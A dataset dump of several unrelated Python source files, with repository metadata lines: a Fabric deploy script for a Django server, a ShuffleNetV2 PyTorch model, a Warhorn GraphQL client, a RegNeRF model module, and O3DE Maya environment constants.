populate_args(c, mode=mode, tag=tag, staging=staging, branch=branch)
start_webserver_internal(c)
def start_webserver_internal(c):
print('starting new webserver: "{}"'.format(_webserver_command(c)))
with c.cd(c.config.bgtools.SRC_DIR):
c.run(_webserver_command(c), pty=False, echo=True)
@fabric.task(hosts=[HOST])
def restart_webserver(c, mode=None, tag=None, staging=None, branch=None):
"""
Restarts the webserver that is running the Django instance
"""
populate_args(c, mode=mode, staging=staging, tag=tag, branch=branch)
restart_webserver_internal(c)
def restart_webserver_internal(c):
args = c.config.bgtools
if file_exists(c, args.GUNICORN_PIDFILE):
print('killing existing webserver')
c.run("kill -HUP $(cat {})".format(args.GUNICORN_PIDFILE), echo=True)
else:
start_webserver_internal(c)
def populate_arg(args, existing, argname):
return existing if existing is not None else args[argname]
def populate_args(c, **kwargs):
args = c.config.bgtools
# env.use_ssh_config = True
for k, v in kwargs.items():
print('setting {} to {}'.format(k, populate_arg(args, v, k)))
setattr(args, k, populate_arg(args, v, k))
project = DJANGO_PROJECT_NAME
if args.staging:
project += '_staging'
args.DJANGO_APP_ROOT = posixpath.join(DJANGO_APPS_DIR, project)
# Python version
args.PYTHON_BIN = "python3.5"
# env.PYTHON_PREFIX = "" # e.g. /usr/local Use "" for automatic
# env.PYTHON_FULL_PATH = (posixpath.join(env.PYTHON_PREFIX, 'bin', env.PYTHON_BIN)
# if env.PYTHON_PREFIX else env.PYTHON_BIN)
args.GUNICORN_PIDFILE = posixpath.join(args.DJANGO_APP_ROOT, 'gunicorn.pid')
args.GUNICORN_ERROR_LOGFILE = posixpath.join(LOGS_ROOT_DIR,
'gunicorn_error_{}.log'.format(project))
args.GUNICORN_ACCESS_LOGFILE = posixpath.join(LOGS_ROOT_DIR,
'gunicorn_access_{}.log'.format(project))
args.SRC_DIR = posixpath.join(args.DJANGO_APP_ROOT, DJANGO_PROJECT_NAME)
args.VENV_DIR = posixpath.join(args.DJANGO_APP_ROOT, args.venv_subdir)
args.CHECKOUT_DIR = posixpath.join(args.DJANGO_APP_ROOT, 'checkouts')
args.WSGI_MODULE = '{}.wsgi'.format(DJANGO_PROJECT_NAME)
args.LOCAL_DIR = os.path.dirname(os.path.realpath(__file__))
@fabric.task(hosts=[HOST])
def deploy(c, mode=None, staging=True, tag=None, branch=None):
populate_args(c, mode=mode, staging=staging, tag=tag, branch=branch)
print(c.config.bgtools)
copy_settings(c)
rsync_source(c)
install_dependencies(c)
checkout_and_install_libs(c)
collect_static(c)
restart_webserver_internal(c)
| 2.21875 | 2 |
Deep Thumbnail Face Classification and Verification/models/ShuffleNetV2.py | roycechan/portfolio | 1 | 17641 | import torch
from torch import nn
from torch.autograd import Variable
import config
def init_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.xavier_normal_(m.weight)
if m.bias is not None:
nn.init.constant_(m.bias, 0)
def conv(in_channels, out_channels, kernel_size, stride):
conv = nn.Sequential(
nn.Conv2d(in_channels, out_channels, kernel_size, stride, bias=False),
nn.BatchNorm2d(out_channels),
nn.ReLU(inplace=True))
return conv
def channel_shuffle(x, num_groups):
N, C, H, W = x.size()
x_reshape = x.reshape(N, num_groups, C // num_groups, H, W)
x_permute = x_reshape.permute(0, 2, 1, 3, 4)
return x_permute.reshape(N, C, H, W)
class BasicUnit(nn.Module):
def __init__(self, in_channels, splits=2, groups=2):
super(BasicUnit, self).__init__()
self.in_channels = in_channels
self.splits = splits
self.groups = groups
in_channels = int(in_channels / self.splits)
self.right = nn.Sequential(*[
nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, bias=False),
nn.BatchNorm2d(in_channels),
nn.ReLU(inplace=True),
nn.Conv2d(in_channels, in_channels, kernel_size=3, stride=1, padding=1, bias=False, groups=in_channels),
nn.BatchNorm2d(in_channels),
nn.Conv2d(in_channels, in_channels, kernel_size=1, stride=1, bias=False),
nn.BatchNorm2d(in_channels),
nn.ReLU(inplace=True)
])
init_weights(self)
def forward(self, x):
split = torch.split(x, int(self.in_channels / self.splits), dim=1)
x_left, x_right = split
x_right = self.right(x_right)
x = torch.cat([x_left, x_right], dim=1)
out = channel_shuffle(x, self.groups)
# print("Basic Unit", out.size())
return out
class DownUnit(nn.Module):
def __init__(self, in_channels, out_channels, groups=2):
super(DownUnit, self).__init__()
self.in_channels = in_channels
self.out_channels = out_channels
self.groups = groups
self.left = nn.Sequential(*[
nn.Conv2d(self.in_channels, self.in_channels, kernel_size=3, stride=2, bias=False, groups=self.in_channels),
nn.BatchNorm2d(self.in_channels),
nn.Conv2d(self.in_channels, self.out_channels // 2, kernel_size=1, stride=1, bias=False),
nn.BatchNorm2d(self.out_channels // 2),
nn.ReLU(inplace=True)
])
self.right = nn.Sequential(*[
nn.Conv2d(self.in_channels, self.in_channels, kernel_size=1, stride=1, bias=False),
nn.BatchNorm2d(self.in_channels),
nn.ReLU(inplace=True),
nn.Conv2d(self.in_channels, self.in_channels, kernel_size=3, stride=2, bias=False, groups=self.in_channels),
nn.BatchNorm2d(self.in_channels),
nn.Conv2d(self.in_channels, self.out_channels // 2, kernel_size=1, stride=1, bias=False),
nn.BatchNorm2d(self.out_channels // 2),
nn.ReLU(inplace=True)
])
init_weights(self)
def forward(self, x):
x_left = self.left(x)
x_right = self.right(x)
x = torch.cat([x_left, x_right], dim=1)
out = channel_shuffle(x, self.groups)
# print("Down Unit", out.size())
return out
class ShuffleNetV2(nn.Module):
def __init__(self, n_class, net_size):
super(ShuffleNetV2, self).__init__()
out_channels = config.net_size[net_size]
num_blocks = config.net_blocks
self.conv1 = conv(in_channels=3, out_channels=out_channels[0],
kernel_size=config.conv1_kernel_size,
stride=config.conv1_stride)
self.in_channels = out_channels[0]
self.stage2 = self._make_stage(out_channels[1], num_blocks[0])
self.stage3 = self._make_stage(out_channels[2], num_blocks[1])
# self.stage4 = self._make_stage(out_channels[3], num_blocks[2])
self.conv5 = conv(in_channels=out_channels[2],
out_channels=out_channels[3],
kernel_size=config.conv5_kernel_size,
stride=config.conv5_stride)
self.global_pool = nn.AvgPool2d(kernel_size=config.global_pool_kernel_size)
self.fc = nn.Linear(out_channels[3], n_class)
def _make_stage(self, out_channels, num_blocks):
stage = []
stage.append(DownUnit(self.in_channels, out_channels))
for i in range(num_blocks):
stage.append(BasicUnit(out_channels))
self.in_channels = out_channels # update in_channels for next iter
return nn.Sequential(*stage)
def forward(self, x):
out = self.conv1(x)
out = self.stage2(out)
out = self.stage3(out)
# out = self.stage4(out)
out = self.conv5(out)
out = self.global_pool(out)
out = out.view(out.size(0), -1) # flatten
out = self.fc(out)
return out
def test():
net = ShuffleNetV2(2300, 2)
x = Variable(torch.randn(3, 3, 32, 32))
y = net(x)
print("end", y.size())
if __name__ == '__main__':
test()
| 2.453125 | 2 |
warhorn_api.py | jagerkin/warbot | 1 | 17642 | <gh_stars>1-10
# Copyright 2021 <NAME>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Warhorn GraphQL client."""
import collections.abc
import datetime
import logging
from typing import AsyncGenerator, Dict, Optional, Sequence, Tuple, Union
import pytz
from gql import gql, Client
from gql.transport.aiohttp import AIOHTTPTransport
from gql.transport.aiohttp import log as gql_logger
_QUERY = '''\
{{
eventSessions(
events: ["{slug}"],
startsAfter: "{startsAfter}") {{
nodes {{
status
scenario {{
name
}}
scenarioOffering {{
customName
}}
signupUrl
uuid
slot {{
timezone
startsAt
endsAt
}}
}}
}}
}}'''
_GQLNode = Optional[Union[str, Dict[str, '_GQLNode'], Sequence['_GQLNode']]]
class GraphNode:
"""Wrapper for GraphQL nodes that don't make the type system (or me) cry."""
__slots__ = ('_node', )
def __init__(self, node: _GQLNode) -> None:
"""Init a GraphNode.
Args:
node: GraphQL result node.
"""
self._node: _GQLNode = node
def path(self, *path: str) -> 'GraphNode': # pylint: disable=used-before-assignment
"""Resolve a path under this node.
Args:
path: Sequence of key values to lookup.
Returns:
Node navigated to, or a None node if no such node existed.
"""
node = self._node
for p in path:
if not isinstance(node, dict):
return GraphNode(None)
node = node.get(p)
return GraphNode(node)
@property
def str(self) -> str:
"""Return the node as a string if it is one, else ''."""
if isinstance(self._node, str):
return self._node
return ''
@property
def tuple(self) -> Tuple['GraphNode', ...]:
"""Return the node as a Tuple of GraphNodes if it's a sequence, else an empty tuple."""
if isinstance(self._node, collections.abc.Sequence):
return tuple(GraphNode(e) for e in self._node)
return tuple()
def _strings_exists(*strings: str) -> bool:
"""Check that all of the strings exist and none of them are just the str 'None'."""
for s in strings:
if s in ('', 'None'):
return False
return True
class Game:
"""Game holds the key information about a Warhorn D&D session."""
__slots__ = 'uuid', 'name', 'url', 'status', 'starts', 'ends'
def __init__(self, session: GraphNode) -> None:
"""Init new Game.
Args:
session: Warhorn GraphQL session node to extract game data from.
Throws:
ValueError: in the event of key missing values, like a start time.
"""
self.uuid: str = session.path('uuid').str
"""Warhorn session UUID."""
self.name: str = (
session.path('scenarioOffering', 'customName').str
or session.path('scenario', 'name').str)
"""Game scenario name."""
self.url = session.path('signupUrl').str
"""Warhorn session signup URL."""
self.status: str = session.path('status').str
"""Warhorn session status. (e.g. PUBLISHED, DRAFT, CANCELED)"""
starts = session.path('slot', 'startsAt').str
ends = session.path('slot', 'endsAt').str
tz_str = session.path('slot', 'timezone').str or 'US/Pacific'
if not _strings_exists(self.uuid, self.name, self.status, self.url, starts, ends, tz_str):
raise ValueError(f'Missing key values for game session: {session}')
tz = pytz.timezone(tz_str)
self.starts: datetime.datetime = datetime.datetime.fromisoformat(starts).astimezone(tz)
"""Game start time."""
self.ends: datetime.datetime = datetime.datetime.fromisoformat(ends).astimezone(tz)
"""Game end time."""
@property
def time(self) -> str:
"""String describing game start/end time."""
return f'{self.starts:%-I:%M%p} - {self.ends:%-I:%M%p %Z %b %d, %Y}'
def __repr__(self) -> str:
return f'Game("{self.name}", {self.time}, {self.status}, uuid: {self.uuid})'
class WarhornAPI: # pylint: disable=too-few-public-methods
"""Warhorn client API."""
def __init__(self, url: str='https://warhorn.net/graphql', token: str='') -> None:
"""Init Warhorn client.
Args:
url: Warhorn GraphQL endpoint.
"""
headers = {}
if token:
headers['Authorization'] = f'Bearer {token}'
self._transport = AIOHTTPTransport(url=url, headers=headers)
self._client = Client(transport=self._transport, fetch_schema_from_transport=False)
gql_logger.setLevel(logging.WARNING) # type: ignore
async def get_games(
self, slug: str, starts_after: Optional[datetime.datetime]=None
) -> AsyncGenerator[Game, None]:
"""Query Warhorn for games.
Args:
slug: identifying string for the warhorn event.
starts_after: Only return Games beginning after this time.
Returns:
Generator of games.
"""
starts_after = starts_after if starts_after else datetime.datetime.now()
q = _QUERY.format(slug=slug, startsAfter=starts_after.isoformat())
query = gql(q)
result = GraphNode(await self._client.execute_async(query)) # type: ignore
for session in result.path('eventSessions', 'nodes').tuple:
status = session.path('status').str
if status not in ('PUBLISHED', 'DRAFT', 'CANCELED'):
logging.warn('Unexpected sessions status: %s', session)
if status != 'PUBLISHED':
continue
yield Game(session)
| 2.015625 | 2 |
regnerf/internal/models.py | gunpowder78/google-research | 1 | 17643 | # coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Different model implementation plus a general port for all the models."""
import functools
from typing import Any, Callable
from flax import linen as nn
import gin
from internal import mip, utils # pylint: disable=g-multiple-import
import jax
from jax import random
import jax.numpy as jnp
@gin.configurable
class MipNerfModel(nn.Module):
"""Nerf NN Model with both coarse and fine MLPs."""
config: Any = None # A Config class, must be set upon construction.
num_samples: int = 128 # The number of samples per level.
num_levels: int = 2 # The number of sampling levels.
stop_level_grad: bool = True # If True, don't backprop across levels.
use_viewdirs: bool = True # If True, use view directions as input.
genspace_fn: Callable[Ellipsis, Any] = None # The genspace() curve function.
ray_shape: str = 'cone' # The shape of cast rays ('cone' or 'cylinder').
disable_integration: bool = False # If True, use PE instead of IPE.
single_jitter: bool = False # If True, jitter whole rays instead of samples.
@nn.compact
def __call__(
self,
rng,
rays,
resample_padding,
compute_extras,
):
"""The mip-NeRF Model.
Args:
rng: random number generator (or None for deterministic output).
rays: util.Rays, a pytree of ray origins, directions, and viewdirs.
resample_padding: float, the histogram padding to use when resampling.
compute_extras: bool, if True, compute extra quantities besides color.
Returns:
ret: list, [*(rgb, distance, acc)]
"""
# Construct the MLP.
mlp = MLP()
renderings = []
for i_level in range(self.num_levels):
if rng is None:
key = None
else:
key, rng = random.split(rng)
if i_level == 0:
# Stratified sampling along rays
t_vals, samples = mip.sample_along_rays(
key,
rays.origins,
rays.directions,
rays.radii,
self.num_samples,
rays.near,
rays.far,
self.genspace_fn,
self.ray_shape,
self.single_jitter,
)
else:
t_vals, samples = mip.resample_along_rays(
key,
rays.origins,
rays.directions,
rays.radii,
t_vals,
weights,
self.ray_shape,
self.stop_level_grad,
resample_padding,
self.single_jitter,
)
if self.disable_integration:
samples = (samples[0], jnp.zeros_like(samples[1]))
# Point attribute predictions
if self.use_viewdirs:
(rgb, density, normals) = mlp(rng, samples, rays.viewdirs)
else:
(rgb, density, normals) = mlp(rng, samples, None)
# Volumetric rendering.
weights, _, _, delta = mip.compute_alpha_weights(
density, t_vals, rays.directions)
rendering = mip.volumetric_rendering(
rgb,
weights,
normals,
t_vals,
self.config.white_background,
self.config.vis_num_rays,
compute_extras,
delta,
)
renderings.append(rendering)
return renderings
def construct_mipnerf(rng, rays, config):
"""Construct a Neural Radiance Field.
Args:
rng: jnp.ndarray. Random number generator.
rays: an example of input Rays.
config: A Config class.
Returns:
model: nn.Model. Nerf model with parameters.
state: flax.Module.state. Nerf model state for stateful parameters.
"""
# Grab just 10 rays, to minimize memory overhead during construction.
ray = jax.tree_map(lambda x: jnp.reshape(x, [-1, x.shape[-1]])[:10], rays)
model = MipNerfModel(config=config)
init_variables = model.init(
rng, rng=None, rays=ray, resample_padding=0., compute_extras=False)
return model, init_variables
def cosine_easing_window(alpha, min_freq_log2=0, max_freq_log2=16):
"""Eases in each frequency one by one with a cosine.
This is equivalent to taking a Tukey window and sliding it to the right
along the frequency spectrum.
Args:
alpha: will ease in each frequency as alpha goes from 0.0 to num_freqs.
min_freq_log2: the lower frequency band.
max_freq_log2: the upper frequency band.
Returns:
A 1-d numpy array with num_sample elements containing the window.
"""
num_bands = max_freq_log2 - min_freq_log2
bands = jnp.linspace(min_freq_log2, max_freq_log2, num_bands)
x = jnp.clip(alpha - bands, 0.0, 1.0)
values = 0.5 * (1 + jnp.cos(jnp.pi * x + jnp.pi))
# always set first 4 freqs to 1
values = values.reshape(-1)
values = jnp.concatenate([jnp.ones_like(values[:4]), values[4:]])
values = jnp.repeat(values.reshape(-1, 1), 3, axis=1).reshape(-1)
return jnp.stack([values, values])
@gin.configurable
class MLP(nn.Module):
"""A simple MLP."""
net_depth: int = 8 # The depth of the first part of MLP.
net_width: int = 256 # The width of the first part of MLP.
net_depth_viewdirs: int = 1 # The depth of the second part of MLP.
net_width_viewdirs: int = 128 # The width of the second part of MLP.
net_activation: Callable[Ellipsis, Any] = nn.relu # The activation function.
# Initializer for the weights of the MLP.
weight_init: Callable[Ellipsis, Any] = jax.nn.initializers.glorot_uniform()
skip_layer: int = 4 # Add a skip connection to the output of every N layers.
num_rgb_channels: int = 3 # The number of RGB channels.
min_deg_point: int = 0 # Min degree of positional encoding for 3D points.
max_deg_point: int = 16 # Max degree of positional encoding for 3D points.
deg_view: int = 4 # Degree of positional encoding for viewdirs.
density_activation: Callable[Ellipsis, Any] = nn.softplus # Density activation.
density_noise: float = 0. # Standard deviation of noise added to raw density.
density_bias: float = -1. # The shift added to raw densities pre-activation.
rgb_activation: Callable[Ellipsis, Any] = nn.sigmoid # The RGB activation.
rgb_padding: float = 0.001 # Padding added to the RGB outputs.
disable_normals: bool = False # If True, don't bother computing normals.
@nn.compact
def __call__(self, rng, samples, viewdirs=None):
"""Evaluate the MLP.
Args:
rng: random number generator (or None for deterministic output).
samples: a tuple containing:
- mean: [..., num_samples, 3], coordinate means, and
- cov: [..., num_samples, 3{, 3}], coordinate covariance matrices.
viewdirs: jnp.ndarray(float32), [batch, 3], if not None, this variable
will be part of the input to the second part of the MLP concatenated
with the output vector of the first part of the MLP. If None, only the
first part of the MLP will be used with input x. In the original paper,
this variable is the view direction.
Returns:
rgb: jnp.ndarray(float32), with a shape of [..., num_rgb_channels].
density: jnp.ndarray(float32), with a shape of [...].
normals: jnp.ndarray(float32), with a shape of [..., 3].
"""
dense_layer = functools.partial(nn.Dense, kernel_init=self.weight_init)
def predict_density(rng, means, covs):
"""Helper function to output density."""
# Encode input positions
inputs = mip.integrated_pos_enc(
(means, covs), self.min_deg_point, self.max_deg_point)
# Evaluate network to output density
x = inputs
for i in range(self.net_depth):
x = dense_layer(self.net_width)(x)
x = self.net_activation(x)
if i % self.skip_layer == 0 and i > 0:
x = jnp.concatenate([x, inputs], axis=-1)
raw_density = dense_layer(1)(x)[Ellipsis, 0] # Hardcoded to a single channel.
# Add noise to regularize the density predictions if needed.
if (rng is not None) and (self.density_noise > 0):
key, rng = random.split(rng)
raw_density += self.density_noise * random.normal(
key, raw_density.shape, dtype=raw_density.dtype)
# Apply bias and activation to raw density
density = self.density_activation(raw_density + self.density_bias)
return density, x
means, covs = samples
if self.disable_normals:
density, x = predict_density(rng, means, covs)
normals = jnp.full_like(means, fill_value=jnp.nan)
else:
# Flatten the input so value_and_grad can be vmap'ed.
means_flat = means.reshape([-1, means.shape[-1]])
covs_flat = covs.reshape([-1] + list(covs.shape[len(means.shape) - 1:]))
# Evaluate the network and its gradient on the flattened input.
predict_density_and_grad_fn = jax.vmap(
jax.value_and_grad(predict_density, argnums=1, has_aux=True),
in_axes=(None, 0, 0))
(density_flat, x_flat), density_grad_flat = (
predict_density_and_grad_fn(rng, means_flat, covs_flat))
# Unflatten the output.
density = density_flat.reshape(means.shape[:-1])
x = x_flat.reshape(list(means.shape[:-1]) + [x_flat.shape[-1]])
density_grad = density_grad_flat.reshape(means.shape)
# Compute surface normals as negative normalized density gradient
eps = jnp.finfo(jnp.float32).eps
normals = -density_grad / jnp.sqrt(
jnp.maximum(jnp.sum(density_grad**2, axis=-1, keepdims=True), eps))
if viewdirs is not None:
viewdirs_enc = mip.pos_enc(
viewdirs, min_deg=0, max_deg=self.deg_view, append_identity=True)
# Output of the first part of MLP.
bottleneck = dense_layer(self.net_width)(x)
viewdirs_enc = jnp.broadcast_to(
viewdirs_enc[Ellipsis, None, :],
list(bottleneck.shape[:-1]) + [viewdirs_enc.shape[-1]])
x = jnp.concatenate([bottleneck, viewdirs_enc], axis=-1)
# Here use 1 extra layer to align with the original nerf model.
for _ in range(self.net_depth_viewdirs):
x = dense_layer(self.net_width_viewdirs)(x)
x = self.net_activation(x)
rgb = self.rgb_activation(dense_layer(self.num_rgb_channels)(x))
rgb = rgb * (1 + 2 * self.rgb_padding) - self.rgb_padding
return (rgb, density, normals)
def render_image(render_fn, rays, rng, config):
"""Render all the pixels of an image (in test mode).
Args:
render_fn: function, jit-ed render function.
rays: a `Rays` pytree, the rays to be rendered.
rng: jnp.ndarray, random number generator (used in training mode only).
config: A Config class.
Returns:
rgb: jnp.ndarray, rendered color image.
disp: jnp.ndarray, rendered disparity image.
acc: jnp.ndarray, rendered accumulated weights per pixel.
"""
height, width = rays.origins.shape[:2]
num_rays = height * width
rays = jax.tree_map(lambda r: r.reshape((num_rays, -1)), rays)
host_id = jax.host_id()
chunks = []
idx0s = range(0, num_rays, config.render_chunk_size)
for i_chunk, idx0 in enumerate(idx0s):
# pylint: disable=cell-var-from-loop
if i_chunk % max(1, len(idx0s) // 10) == 0:
print(f'Rendering chunk {i_chunk}/{len(idx0s)-1}')
chunk_rays = (
jax.tree_map(lambda r: r[idx0:idx0 + config.render_chunk_size], rays))
actual_chunk_size = chunk_rays.origins.shape[0]
rays_remaining = actual_chunk_size % jax.device_count()
if rays_remaining != 0:
padding = jax.device_count() - rays_remaining
chunk_rays = jax.tree_map(
lambda r: jnp.pad(r, ((0, padding), (0, 0)), mode='edge'), chunk_rays)
else:
padding = 0
# After padding the number of chunk_rays is always divisible by host_count.
rays_per_host = chunk_rays.origins.shape[0] // jax.host_count()
start, stop = host_id * rays_per_host, (host_id + 1) * rays_per_host
chunk_rays = jax.tree_map(lambda r: utils.shard(r[start:stop]), chunk_rays)
chunk_renderings = render_fn(rng, chunk_rays)
# Unshard the renderings
chunk_renderings = [{k: utils.unshard(v[0], padding)
for k, v in r.items()}
for r in chunk_renderings]
chunk_rendering = chunk_renderings[-1]
keys = [k for k in chunk_renderings[0] if k.find('ray_') == 0]
for k in keys:
chunk_rendering[k] = [r[k] for r in chunk_renderings]
chunks.append(chunk_rendering)
rendering = {}
for k in chunks[0]:
if isinstance(chunks[0][k], list):
rendering[k] = [r[k] for r in chunks]
ds = range(len(rendering[k][0]))
rendering[k] = [jnp.concatenate([r[d] for r in rendering[k]]) for d in ds]
else:
rendering[k] = jnp.concatenate([r[k] for r in chunks])
rendering[k] = (
rendering[k].reshape((height, width) + chunks[0][k].shape[1:]))
# After all of the ray bundles have been concatenated together, extract a
# new random bundle (deterministically) from the concatenation that is the
# same size as one of the individual bundles.
keys = [k for k in rendering if k.find('ray_') == 0]
if keys:
ray_idx = random.permutation(
random.PRNGKey(0), rendering[keys[0]][0].shape[0])[:config.vis_num_rays]
for k in keys:
rendering[k] = [r[ray_idx] for r in rendering[k]]
return rendering
| 1.820313 | 2 |
Gems/AtomLyIntegration/TechnicalArt/DccScriptingInterface/Tools/DCC/Maya/constants.py | prophetl33t/o3de | 0 | 17644 | <reponame>prophetl33t/o3de
# coding:utf-8
#!/usr/bin/python
#
# Copyright (c) Contributors to the Open 3D Engine Project.
# For complete copyright and license terms please see the LICENSE at the root of this distribution.
#
# SPDX-License-Identifier: Apache-2.0 OR MIT
#
#
# -------------------------------------------------------------------------
"""! @brief
Module Documentation:
< DCCsi >:: Tools/DCC/Maya/constants.py
This module contains default values for commony used constants & strings.
We can make an update here easily that is propogated elsewhere.
"""
# -------------------------------------------------------------------------
# built-ins
import sys
import os
import site
import timeit
import inspect
from os.path import expanduser
from pathlib import Path
import logging as _logging
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
_START = timeit.default_timer() # start tracking
# global scope
_MODULENAME = 'Tools.DCC.Maya.constants'
_LOGGER = _logging.getLogger(_MODULENAME)
_LOGGER.debug('Initializing: {}.'.format({_MODULENAME}))
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Maya is frozen
# module path when frozen
_MODULE_PATH = Path(os.path.abspath(inspect.getfile(inspect.currentframe())))
_LOGGER.debug('_MODULE_PATH: {}'.format(_MODULE_PATH))
_PATH_DCCSI_TOOLS_MAYA = Path(_MODULE_PATH.parent)
_PATH_DCCSI_TOOLS_MAYA = Path(os.getenv('PATH_DCCSI_TOOLS_MAYA',
_PATH_DCCSI_TOOLS_MAYA.as_posix()))
_PATH_DCCSI_TOOLS_DCC = Path(_PATH_DCCSI_TOOLS_MAYA.parent)
_PATH_DCCSI_TOOLS_DCC = Path(os.getenv('PATH_DCCSI_TOOLS_DCC',
_PATH_DCCSI_TOOLS_DCC.as_posix()))
_PATH_DCCSI_TOOLS = Path(_PATH_DCCSI_TOOLS_DCC.parent)
_PATH_DCCSI_TOOLS = Path(os.getenv('PATH_DCCSI_TOOLS',
_PATH_DCCSI_TOOLS.as_posix()))
# we need to set up basic access to the DCCsi
_PATH_DCCSIG = Path(_PATH_DCCSI_TOOLS.parent)
_PATH_DCCSIG = Path(os.getenv('PATH_DCCSIG', _PATH_DCCSIG.as_posix()))
site.addsitedir(_PATH_DCCSIG.as_posix())
_LOGGER.debug('_PATH_DCCSIG: {}'.format(_PATH_DCCSIG.as_posix()))
# this is the shared default requirements.txt file to install for python 3.6.x+
DCCSI_PYTHON_REQUIREMENTS = Path(_PATH_DCCSIG, 'requirements.txt').as_posix()
# if using maya 2020 or less with py2.7 override with and use the one here:
# "DccScriptingInterface\Tools\DCC\Maya\requirements.txt"
# now we have azpy api access
from azpy.env_bool import env_bool
from azpy.constants import ENVAR_DCCSI_GDEBUG
from azpy.constants import ENVAR_DCCSI_DEV_MODE
from azpy.constants import ENVAR_DCCSI_LOGLEVEL
from azpy.constants import ENVAR_DCCSI_GDEBUGGER
from azpy.constants import FRMT_LOG_LONG
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
from azpy.constants import * # but here are the specific ones we are gonna use
from azpy.constants import PATH_PROGRAMFILES_X64
from azpy.constants import TAG_PY_MAJOR
from azpy.constants import TAG_PY_MINOR
from azpy.constants import PATH_USER_HOME
from azpy.constants import PATH_USER_O3DE
from azpy.constants import ENVAR_O3DE_DEV
from azpy.constants import PATH_O3DE_DEV
from azpy.constants import ENVAR_PATH_DCCSIG
from azpy.constants import PATH_DCCSIG
from azpy.constants import ENVAR_DCCSI_LOG_PATH
from azpy.constants import PATH_DCCSI_LOG_PATH
from azpy.constants import ENVAR_DCCSI_PY_VERSION_MAJOR
from azpy.constants import ENVAR_DCCSI_PY_VERSION_MINOR
from azpy.constants import ENVAR_PATH_DCCSI_PYTHON_LIB
from azpy.constants import STR_PATH_DCCSI_PYTHON_LIB
from azpy.constants import PATH_DCCSI_PYTHON_LIB
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# dcc: Maya ENVAR constants
ENVAR_DCCSI_PY_VERSION_MAJOR=str("DCCSI_PY_VERSION_MAJOR")
ENVAR_DCCSI_PY_VERSION_MINOR=str("DCCSI_PY_VERSION_MINOR")
ENVAR_DCCSI_PY_VERSION_RELEASE=str("DCCSI_PY_VERSION_RELEASE")
ENVAR_MAYA_NO_CONSOLE_WINDOW = str("MAYA_NO_CONSOLE_WINDOW")
ENVAR_MAYA_SHOW_OUTPUT_WINDOW = str("MAYA_SHOW_OUTPUT_WINDOW")
TAG_O3DE_DCC_MAYA_MEL = 'dccsi_setup.mel'
TAG_MAYA_WORKSPACE = 'workspace.mel'
ENVAR_DCCSI_PY_MAYA = str('DCCSI_PY_MAYA')
ENVAR_MAYA_VERSION = str('MAYA_VERSION')
ENVAR_MAYA_LOCATION = str('MAYA_LOCATION')
ENVAR_PATH_DCCSI_TOOLS_MAYA = str('PATH_DCCSI_TOOLS_MAYA')
ENVAR_MAYA_MODULE_PATH = str('MAYA_MODULE_PATH')
ENVAR_MAYA_BIN_PATH = str('MAYA_BIN_PATH')
ENVAR_DCCSI_MAYA_PLUG_IN_PATH = str('DCCSI_MAYA_PLUG_IN_PATH')
ENVAR_MAYA_PLUG_IN_PATH = str('MAYA_PLUG_IN_PATH')
ENVAR_DCCSI_MAYA_SHELF_PATH = str('DCCSI_MAYA_SHELF_PATH')
ENVAR_MAYA_SHELF_PATH = str('MAYA_SHELF_PATH')
ENVAR_DCCSI_MAYA_XBMLANGPATH = str('DCCSI_MAYA_XBMLANGPATH')
ENVAR_XBMLANGPATH = str('XBMLANGPATH')
ENVAR_DCCSI_MAYA_SCRIPT_MEL_PATH = str('DCCSI_MAYA_SCRIPT_MEL_PATH')
ENVAR_DCCSI_MAYA_SCRIPT_PY_PATH = str('DCCSI_MAYA_SCRIPT_PY_PATH')
ENVAR_DCCSI_MAYA_SCRIPT_PATH = str("DCCSI_MAYA_SCRIPT_PATH")
ENVAR_MAYA_SCRIPT_PATH = str('MAYA_SCRIPT_PATH')
ENVAR_DCCSI_MAYA_SET_CALLBACKS = str('DCCSI_MAYA_SET_CALLBACKS')
ENVAR_MAYA_VP2_DEVICE_OVERRIDE=str("MAYA_VP2_DEVICE_OVERRIDE")
ENVAR_MAYA_OGS_DEVICE_OVERRIDE=str("MAYA_OGS_DEVICE_OVERRIDE")
# -------------------------------------------------------------------------
# -------------------------------------------------------------------------
# Maya consts
#USER_HOME = Path.home()
# mimicing all values from: "DccScriptingInterface\Tools\Dev\Windows\Env_DCC_Maya.bat"
# note: these are just default values, they are only initially CONST
# if/when imported from here (constants.py)
DCCSI_PY_VERSION_MAJOR = 3
DCCSI_PY_VERSION_MINOR = 7
DCCSI_PY_VERSION_RELEASE = 7
# override with maya defaults
PATH_DCCSI_PYTHON_LIB = STR_PATH_DCCSI_PYTHON_LIB.format(_PATH_DCCSIG,
DCCSI_PY_VERSION_MAJOR,
DCCSI_PY_VERSION_MINOR)
# not actually a maya envar, to do: could rename DCCSI_MAYA_VERSION
MAYA_VERSION=2022
# is a maya envar
MAYA_PROJECT = _PATH_DCCSIG.as_posix()
PATH_DCCSI_TOOLS_MAYA = _PATH_DCCSI_TOOLS_MAYA.as_posix()
# is a maya envar
MAYA_MODULE_PATH = _PATH_DCCSI_TOOLS_MAYA.as_posix()
# is a maya envar
MAYA_LOCATION = Path(PATH_PROGRAMFILES_X64,'Autodesk', 'Maya{}'.format(MAYA_VERSION)).as_posix()
# is a maya envar
MAYA_BIN_PATH = Path(MAYA_LOCATION, 'bin').as_posix()
DCCSI_MAYA_SET_CALLBACKS = True
# is a maya envar
MAYA_NO_CONSOLE_WINDOW = False
MAYA_SHOW_OUTPUT_WINDOW = True
DCCSI_MAYA_EXE = Path(MAYA_BIN_PATH, 'maya.exe')
